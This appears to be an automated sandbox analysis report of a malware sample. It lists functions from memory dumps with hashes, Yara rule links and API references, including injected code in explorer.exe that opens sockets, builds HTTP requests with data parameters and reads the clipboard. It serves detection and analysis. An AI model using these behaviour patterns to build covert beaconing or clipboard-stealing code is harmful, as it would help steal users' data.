Uniqueness Score: -1.00%

Function 01B7AD30, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 488e783b9933b5b54db47e0b2b58267271344ad4421d518b5c4a0e88ed25066b
Instruction ID: bfbbb639eb1aeaf12b976088840bdc11b230fcd9f00b7f901860cac9784fdbe6
Opcode Fuzzy Hash: 488e783b9933b5b54db47e0b2b58267271344ad4421d518b5c4a0e88ed25066b
Instruction Fuzzy Hash: 20900272A0500012914471998814A465006B7E0B81B55C056E0504558CCA948A65A7E1

Uniqueness

Uniqueness Score: -1.00%

Function 01B79520, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2bcf7bfee2e13b81fbdc4637caf50ad0b090892c1c886b19e52dd076428f8b9
Instruction ID: 34d0b3209ce756bb1d3f6d72f3583e67df1a35824e6f0ebe84d62049a888f923
Opcode Fuzzy Hash: f2bcf7bfee2e13b81fbdc4637caf50ad0b090892c1c886b19e52dd076428f8b9
Instruction Fuzzy Hash: 839002E2201140924504B299C404F0A5505A7E0641B51C05BE1044564CC6658861E575

Uniqueness

Uniqueness Score: -1.00%

Function 01B79560, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 287203cf9a6a8f80e25143b5fdfd1536f14a572a321963dab56cb44866d98859
Instruction ID: 0389e6c8f4a080463a054b84d0d41dda3f1785b09c1537c9a3231e69288e1f53
Opcode Fuzzy Hash: 287203cf9a6a8f80e25143b5fdfd1536f14a572a321963dab56cb44866d98859
Instruction Fuzzy Hash: 28900266221000020149B599460490B1445B7D6791391C05AF1406594CC7618875A761

Uniqueness

Uniqueness Score: -1.00%

Function 01B79730, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22fa113da3ec9d3dccd61d8b05561a03b32fb42d3a748d983cfc1468b6e7ee30
Instruction ID: 6322bb1f03270a624dae43889e7ca10b0eabba50aacbb8bad1e00d2370555000
Opcode Fuzzy Hash: 22fa113da3ec9d3dccd61d8b05561a03b32fb42d3a748d983cfc1468b6e7ee30
Instruction Fuzzy Hash: 4890026260500402D14471999418B061015A7D0641F51D056E0014558DC7998A65BAE1

Uniqueness

Uniqueness Score: -1.00%

Function 01B7A710, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c4c67b7b1ddac04c4a29995d2c34312ba71a6d15cdd67c80b398e7f7f4bf5d5
Instruction ID: 499c92f9f763bbbd38ccb2bea20394702e72b81294b51c9c53b472bac1f8ff9b
Opcode Fuzzy Hash: 4c4c67b7b1ddac04c4a29995d2c34312ba71a6d15cdd67c80b398e7f7f4bf5d5
Instruction Fuzzy Hash: 0F900272301000529504B6D99804E4A5105A7F0741B51D05AE4004558CC6948871A561

Uniqueness

Uniqueness Score: -1.00%

Function 01B7A770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a09a285646100627edddefe09d910db670cc7fc48384af5f32ab550c85cd77d
Instruction ID: e778aaf6b764ff0d80efd61013259cd6782fd49d83884679e9814b0bdac25302
Opcode Fuzzy Hash: 9a09a285646100627edddefe09d910db670cc7fc48384af5f32ab550c85cd77d
Instruction Fuzzy Hash: 5390027620504442D50475999804E871005A7D0745F51D456E041459CDC7948871F561

Uniqueness

Uniqueness Score: -1.00%

Function 01B79770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f57714b06b773340139018bf0ee18536b8c6e728ffea679a01c8c3e7c1801850
Instruction ID: 23db7ae87194fc241d4cda86e9577c8df7892cea0f9be75c780242044c774c05
Opcode Fuzzy Hash: f57714b06b773340139018bf0ee18536b8c6e728ffea679a01c8c3e7c1801850
Instruction Fuzzy Hash: 6F90026220504442D10475999408E061005A7D0645F51D056E1054599DC7758861F571

Uniqueness

Uniqueness Score: -1.00%

Function 01B79760, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71a39933d63619d44075547f08ae42a5b4b4f7fffa12cd844a6b4eaabc7af065
Instruction ID: aeadbccec4eadbf8c31c6867d94475f8e1bb450c8c98df89dca4e3b9735efdd3
Opcode Fuzzy Hash: 71a39933d63619d44075547f08ae42a5b4b4f7fffa12cd844a6b4eaabc7af065
Instruction Fuzzy Hash: 2A90027220100403D10471999508B071005A7D0641F51D456E041455CDD7968861B561

Uniqueness

Uniqueness Score: -1.00%

Function 01B796D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a43944e7718010ceb596c506fe869273718ba1089c98039eee2fa7b4865a9331
Instruction ID: 729f0ea2309a216ab25146019be74f60cf00ca2d728c4e47d324da971b3244ce
Opcode Fuzzy Hash: a43944e7718010ceb596c506fe869273718ba1089c98039eee2fa7b4865a9331
Instruction Fuzzy Hash: 9C90027220100842D10471998404F461005A7E0741F51C05BE0114658DC755C861B961

Uniqueness

Uniqueness Score: -1.00%

Function 01B79610, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c155a1f359a47caf6fe8d605adade9c94f46811f018397950d363e15f4c31fc
Instruction ID: 6bd54553b2fffc9a437843c434275331f77cc2bb2483061cfee6ceed8466b4c6
Opcode Fuzzy Hash: 1c155a1f359a47caf6fe8d605adade9c94f46811f018397950d363e15f4c31fc
Instruction Fuzzy Hash: 6690027260500802D15471998414B461005A7D0741F51C056E0014658DC7958A65BAE1

Uniqueness

Uniqueness Score: -1.00%

Function 01B79650, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8234dd1600e642b2ab060698e94c36134f26fea7eacf9eb0c41953f0eceedc50
Instruction ID: f66d6c5c04ebe6a11e3ab934f857bbd6707fc9838d12f0b2cf1251859d687234
Opcode Fuzzy Hash: 8234dd1600e642b2ab060698e94c36134f26fea7eacf9eb0c41953f0eceedc50
Instruction Fuzzy Hash: D890027220504842D14471998404E461015A7D0745F51C056E0054698DD7658D65FAA1

Uniqueness

Uniqueness Score: -1.00%

Function 01B79670, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: a370c3fa84ca3e01cbfabf1e0d8becf035d353c9fd911b650c7b6bf9ba5c41df
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 01BCFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E01BCFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E01B7CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E01BC5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E01BC5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x01bcfdda
0x01bcfde2
0x01bcfde5
0x01bcfdec
0x01bcfdfa
0x01bcfdff
0x01bcfe0a
0x01bcfe0f
0x01bcfe17
0x01bcfe1e
0x01bcfe19
0x01bcfe19
0x01bcfe19
0x01bcfe20
0x01bcfe21
0x01bcfe22
0x01bcfe25
0x01bcfe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01BCFDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 01BCFE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 01BCFE2B

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 6007da7ad06a566d55fcb0efdb9c8420c008d35191b0d8562097dc6d8160970f
Instruction ID: 0675671f939abe4a1f9ced0ea7cc76bcc29b349b7b856d6505c8001b9f827e01
Opcode Fuzzy Hash: 6007da7ad06a566d55fcb0efdb9c8420c008d35191b0d8562097dc6d8160970f
Instruction Fuzzy Hash: DCF0FC32200102BFDA281A45DC05F337F5ADB44B31F14439DF628561E1DB62F86086F0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: explorer.exe PID: 3424 Parent PID: 7140 explorer.exeCOMMON

Executed Functions

Function 04DCC302, Relevance: 23.7, APIs: 3, Strings: 10, Instructions: 911networkCOMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32 ref: 04DCC4AE
setsockopt.WS2_32 ref: 04DCCCB2
recv.WS2_32 ref: 04DCCCDA

Strings

nnec, xrefs: 04DCC72E
GET , xrefs: 04DCC768
tion, xrefs: 04DCC736
ose, xrefs: 04DCC746
dat=, xrefs: 04DCC6A4
&un=, xrefs: 04DCC948
: cl, xrefs: 04DCC73E
=, xrefs: 04DCC8D0
Co, xrefs: 04DCC726
&br=, xrefs: 04DCC979

Memory Dump Source

Source File: 0000000F.00000002.919182822.0000000004DA0000.00000040.00000001.sdmp, Offset: 04DA0000, based on PE: false

Similarity

API ID: getaddrinforecvsetsockopt
String ID: Co$&br=$&un=$: cl$=$GET $dat=$nnec$ose$tion
API String ID: 1564272048-2976227712
Opcode ID: b31e8b864956b6b4abfa9b859ad4291af29cc5130ca763e476aa0a2d5a1583bf
Instruction ID: 845e7a000c766992ab57cb998ab95ac90f0350b739ce0848a8f53b84a17629e9
Opcode Fuzzy Hash: b31e8b864956b6b4abfa9b859ad4291af29cc5130ca763e476aa0a2d5a1583bf
Instruction Fuzzy Hash: 29628030628B098BDB69EF68D4847AAB7E2FB98704F50452ED59FC7142DF30B446CB91

Uniqueness

Uniqueness Score: -1.00%

Function 04DC5EB2, Relevance: 1.6, APIs: 1, Instructions: 63clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 04DC5F09

Memory Dump Source

Source File: 0000000F.00000002.919182822.0000000004DA0000.00000040.00000001.sdmp, Offset: 04DA0000, based on PE: false

Similarity

API ID: ClipboardOpen
String ID:
API String ID: 2793039342-0
Opcode ID: c435c781f8fbf6caabe55a16d7c60c026a95aedc4a66d9b66e8dd31f9fb2c40d
Instruction ID: a914e76c718f8532b634f03ec694eadf59d25a14a8c69453b16d4636af088339
Opcode Fuzzy Hash: c435c781f8fbf6caabe55a16d7c60c026a95aedc4a66d9b66e8dd31f9fb2c40d
Instruction Fuzzy Hash: 1311A530214D1A9FDB59AB2894AC3B631D0FB48306F9814BD944ECF0C1DF76E586DB50

Uniqueness

Uniqueness Score: -1.00%

Function 04DC8EFE, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35COMMON

Download Yara Rule

APIs

closesocket.WS2_32 ref: 04DC8F57

Strings

clos, xrefs: 04DC8F1A
ket, xrefs: 04DC8F2A
esoc, xrefs: 04DC8F22

Memory Dump Source

Source File: 0000000F.00000002.919182822.0000000004DA0000.00000040.00000001.sdmp, Offset: 04DA0000, based on PE: false

Similarity

API ID: closesocket
String ID: clos$esoc$ket
API String ID: 2781271927-3604069445
Opcode ID: debb1de1ae8bd1935cf3204c4e922018d3bc3bd1fa25b861d450e182fb477b51
Instruction ID: 61c245f9f5ae425b0b17bdb3631023364ec4b37c3b322122e8b342b132c8cf72
Opcode Fuzzy Hash: debb1de1ae8bd1935cf3204c4e922018d3bc3bd1fa25b861d450e182fb477b51
Instruction Fuzzy Hash: 32F06D7021CB089BCBC0EF2894897A9B7E0FB99315F54056EE48DCB204CB7895428782

Uniqueness

Uniqueness Score: -1.00%

Function 04DC8F02, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON

Download Yara Rule

APIs

closesocket.WS2_32 ref: 04DC8F57

Strings

clos, xrefs: 04DC8F1A
ket, xrefs: 04DC8F2A
esoc, xrefs: 04DC8F22

Memory Dump Source

Source File: 0000000F.00000002.919182822.0000000004DA0000.00000040.00000001.sdmp, Offset: 04DA0000, based on PE: false

Similarity

API ID: closesocket
String ID: clos$esoc$ket
API String ID: 2781271927-3604069445
Opcode ID: 38f943f3a1bf856e04ab8ffe01a156dfd9c5375a96730fcfdde4480564b18170
Instruction ID: 87e4306d74e8f31962f4244a11be7739af20048f02b114dc4851f60e37427665
Opcode Fuzzy Hash: 38f943f3a1bf856e04ab8ffe01a156dfd9c5375a96730fcfdde4480564b18170
Instruction Fuzzy Hash: C3F01D7021CB089FDBC4EF18D0C4769B7E0FB99314F54556DB44DCB244CB7485458782

Uniqueness

Uniqueness Score: -1.00%

Function 04DC8E7E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52networkCOMMON

Download Yara Rule

APIs

connect.WS2_32 ref: 04DC8EE1

Strings

ect, xrefs: 04DC8EB1
conn, xrefs: 04DC8EAA

Memory Dump Source

Source File: 0000000F.00000002.919182822.0000000004DA0000.00000040.00000001.sdmp, Offset: 04DA0000, based on PE: false

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: fb95bafb82b3473d6ef4390d0af350634b81bde5baa335949624609cad2727e7
Instruction ID: 3ccc7282f860570087128cb7b2b80b73ccbc6677b1e2665c4da4ac69a4638fbe
Opcode Fuzzy Hash: fb95bafb82b3473d6ef4390d0af350634b81bde5baa335949624609cad2727e7
Instruction Fuzzy Hash: 12017C70618A088FDB84EF1CE088B15BBE0FB58314F1545AFE80DCB227CBB0D8858B81

Uniqueness

Uniqueness Score: -1.00%

Function 04DC8E82, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51networkCOMMON

Download Yara Rule

APIs

connect.WS2_32 ref: 04DC8EE1

Strings

ect, xrefs: 04DC8EB1
conn, xrefs: 04DC8EAA

Memory Dump Source

Source File: 0000000F.00000002.919182822.0000000004DA0000.00000040.00000001.sdmp, Offset: 04DA0000, based on PE: false

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: 26898fd5f90645f94afd46a3ac35e2686c27f416d54a17c3d9a13a012a848fc3
Instruction ID: 0e74f001566157444d70782ed4af2fe0d57010616fc08a2c73fd93fef6849e0c
Opcode Fuzzy Hash: 26898fd5f90645f94afd46a3ac35e2686c27f416d54a17c3d9a13a012a848fc3
Instruction Fuzzy Hash: 4C014F70618A188FDB84EF5CE088B15B7E0FB58315F1545AFE80DCB227CB70D8818B81

Uniqueness

Uniqueness Score: -1.00%

Function 04DC8DF7, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55networkCOMMON

Download Yara Rule

APIs

send.WS2_32 ref: 04DC8E63

Strings

send, xrefs: 04DC8E2A

Memory Dump Source

Source File: 0000000F.00000002.919182822.0000000004DA0000.00000040.00000001.sdmp, Offset: 04DA0000, based on PE: false

Similarity

API ID: send
String ID: send
API String ID: 2809346765-2809346765
Opcode ID: 06a0e18ca9c1e1e84b1de7ba9482a901a96b4c92f796fb4ce4398a9b5ac61c15
Instruction ID: d2ffa509818b21a04c0469ebc8a98bb29f4d9501207005d1a312f3c498c070a7
Opcode Fuzzy Hash: 06a0e18ca9c1e1e84b1de7ba9482a901a96b4c92f796fb4ce4398a9b5ac61c15
Instruction Fuzzy Hash: D1012130618A088FDB84EF5CA089B1577E0EB98324F1545AE984DCB266CB70D881CB82

Uniqueness

Uniqueness Score: -1.00%

Function 04DC8E02, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53networkCOMMON

Download Yara Rule

APIs

send.WS2_32 ref: 04DC8E63

Strings

send, xrefs: 04DC8E2A

Memory Dump Source

Source File: 0000000F.00000002.919182822.0000000004DA0000.00000040.00000001.sdmp, Offset: 04DA0000, based on PE: false

Similarity

API ID: send
String ID: send
API String ID: 2809346765-2809346765
Opcode ID: 3773d62206420a3ed138edb7b0d1187259b6e4662953c22d04494397483c12ef
Instruction ID: cb6fdcfd2be426d6e20f4cda0c1e02a7dcae6df4aba22968123c6cacfe5b557a
Opcode Fuzzy Hash: 3773d62206420a3ed138edb7b0d1187259b6e4662953c22d04494397483c12ef
Instruction Fuzzy Hash: FA01D27061CA088FDB84EF5CE589B1577E4EB5C315F1545AE984DCB266CB70D881CB81

Uniqueness

Uniqueness Score: -1.00%

Function 04DC8D02, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 04DC8D61

Strings

sock, xrefs: 04DC8D29

Memory Dump Source

Source File: 0000000F.00000002.919182822.0000000004DA0000.00000040.00000001.sdmp, Offset: 04DA0000, based on PE: false

Similarity

API ID: socket
String ID: sock
API String ID: 98920635-2415254727
Opcode ID: 324350153747078c09b6e059cc1e16611ed0418a95caa11cf7f7e91404692acf
Instruction ID: 069d3a6c0ad825bfa67bb25e6b27cb4f3604af6a45fd53abf4a15ce3ceb2b717
Opcode Fuzzy Hash: 324350153747078c09b6e059cc1e16611ed0418a95caa11cf7f7e91404692acf
Instruction Fuzzy Hash: C4012870658A188FDB84EF1CE048B14BBE0FB98314F1545AEE84DCB266C7B0D9418B86

Uniqueness

Uniqueness Score: -1.00%

Function 04DC4272, Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

SleepEx.KERNEL32 ref: 04DC42BD

Memory Dump Source

Source File: 0000000F.00000002.919182822.0000000004DA0000.00000040.00000001.sdmp, Offset: 04DA0000, based on PE: false

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: fd57b9079238b9e4bf1c504420f21d1e9a897069bc43c21d39ffc44af76478d5
Instruction ID: 27c15991774aaab9afda1e44874e9a4cc7283f9b4b6aa874d1b93b3d47560303
Opcode Fuzzy Hash: fd57b9079238b9e4bf1c504420f21d1e9a897069bc43c21d39ffc44af76478d5
Instruction Fuzzy Hash: 53213230654B4E8FDF54EF5890A43A9B7E1FB95304F48067E995ECB246CF70A4418B91

Uniqueness

Uniqueness Score: -1.00%

Function 04DC5EAA, Relevance: 1.6, APIs: 1, Instructions: 64clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 04DC5F09

Memory Dump Source

Source File: 0000000F.00000002.919182822.0000000004DA0000.00000040.00000001.sdmp, Offset: 04DA0000, based on PE: false

Similarity

API ID: ClipboardOpen
String ID:
API String ID: 2793039342-0
Opcode ID: 0a81b9c5098993d40a50e0f995296f7c58cd9fe7fb6d482d8f883cb673d857ef
Instruction ID: fface16fe7296835222a01494f0a33f0f843dcdfcf0984e289d48e3dac9f6d6d
Opcode Fuzzy Hash: 0a81b9c5098993d40a50e0f995296f7c58cd9fe7fb6d482d8f883cb673d857ef
Instruction Fuzzy Hash: 3E11A330214D1A9FDB59AB28946C3B932D0FB48306F9854BD944ECF0C2DF75E586DB50

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: wlanext.exe PID: 6984 Parent PID: 3424 wlanext.exeCOMMON

Executed Functions

Function 028481CA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,02843BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02843BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0284821D

Strings

.z`, xrefs: 0284820D, 02848218

Memory Dump Source

Source File: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 3d553f811ccc20941b12f73d839713f968f0d8390c9e3bd2cbd2a0723d2fd7c8
Instruction ID: 6b9740cacf73e24a8520d9fdfe379fc3eed1c3349529783b4301610a0b5d77d7
Opcode Fuzzy Hash: 3d553f811ccc20941b12f73d839713f968f0d8390c9e3bd2cbd2a0723d2fd7c8
Instruction Fuzzy Hash: 4901AFB6205508AFCB18CF98DC94EEB77A9AF8C354F158258FA1DE7241C630E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 028481D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,02843BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02843BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0284821D

Strings

.z`, xrefs: 0284820D, 02848218

Memory Dump Source

Source File: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 863d269cd1b34e659e06b94590814fa716030da33817cd264136d8988c86094c
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: CDF0B2B6201208ABCB08DF88DC84EEB77EDAF8C754F158248BA0D97240C630F8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0284827A, Relevance: 1.5, APIs: 1, Instructions: 37filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(02843D62,5E972F59,FFFFFFFF,02843A21,?,?,02843D62,?,02843A21,FFFFFFFF,5E972F59,02843D62,?,00000000), ref: 028482C5

Memory Dump Source

Source File: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: c6abba368f01d76853fb987b6949bb424dd6aa367f19b779230b59a465f5afe1
Instruction ID: eb22dfc212586198d9ec18fa7d6d5986872db67c59e2f186d9c6aa54e0fc9fed
Opcode Fuzzy Hash: c6abba368f01d76853fb987b6949bb424dd6aa367f19b779230b59a465f5afe1
Instruction Fuzzy Hash: 6CF092B6600108AFCB14DF99DC80EEB77A9AF9C354F158259FA1DA7251D630E9128BA0

Uniqueness

Uniqueness Score: -1.00%

Function 02848280, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(02843D62,5E972F59,FFFFFFFF,02843A21,?,?,02843D62,?,02843A21,FFFFFFFF,5E972F59,02843D62,?,00000000), ref: 028482C5

Memory Dump Source

Source File: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: 3aded4b80425e8343844eae78cfeaed24f4f9387bbbd56e0e3115ce279ce9ed2
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 80F0A4B6200208ABCB14DF89DC80EEB77ADAF8C754F158248BA1D97241DA30E8118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 028483AA, Relevance: 1.5, APIs: 1, Instructions: 32memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02832D11,00002000,00003000,00000004), ref: 028483E9

Memory Dump Source

Source File: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 2a582ed464e0cdf11f74cfa4d26bc635269338c0f31ff06c7736f20a8c1d3473
Instruction ID: ea4dc503bb91ffe1dae74f0f7d1cab41d4fe99677287d501f9b4f65fab029b32
Opcode Fuzzy Hash: 2a582ed464e0cdf11f74cfa4d26bc635269338c0f31ff06c7736f20a8c1d3473
Instruction Fuzzy Hash: 18F01CB5200218AFDB14DF98DC80FEB77A9FF98350F158649FE1997240C631E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 028483B0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02832D11,00002000,00003000,00000004), ref: 028483E9

Memory Dump Source

Source File: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 54b71f6c7ee74041510ff57c0457a2ac229c3ff3ce331f9a093033b410cc6ace
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 56F015B6200208ABCB14DF89DC80EAB77ADAF88750F118148BE0897241C630F810CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02848300, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(02843D40,?,?,02843D40,00000000,FFFFFFFF), ref: 02848325

Memory Dump Source

Source File: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: bed3e1e780e356aaa8d01050ad1f309867a3fee94b259760f0b82c621d155dfd
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: F1D012752002186BD710EF98DC45F97779DEF44750F154455BA189B241C570F9008AE0

Uniqueness

Uniqueness Score: -1.00%

Function 028482CA, Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(02843D40,?,?,02843D40,00000000,FFFFFFFF), ref: 02848325

Memory Dump Source

Source File: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 47a1ce2564d2dc7b3dc2b14440e22eb975d70ab3fb059eff8a7f57e4639f158b
Instruction ID: 2c7c3c0a9c3f6de4bd54c9b8909c46d359b2ff0cd61150b225653e2b20787d17
Opcode Fuzzy Hash: 47a1ce2564d2dc7b3dc2b14440e22eb975d70ab3fb059eff8a7f57e4639f158b
Instruction Fuzzy Hash: 0AC0807D1093481BCB10FBA8ACC25D77794FED131CB144849DC99C3602D674D7115681

Uniqueness

Uniqueness Score: -1.00%

Function 02D99A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02D99A5A

Memory Dump Source

Source File: 00000011.00000002.910088572.0000000002D30000.00000040.00000001.sdmp, Offset: 02D30000, based on PE: true

Associated: 00000011.00000002.910294898.0000000002E4B000.00000040.00000001.sdmp Download File
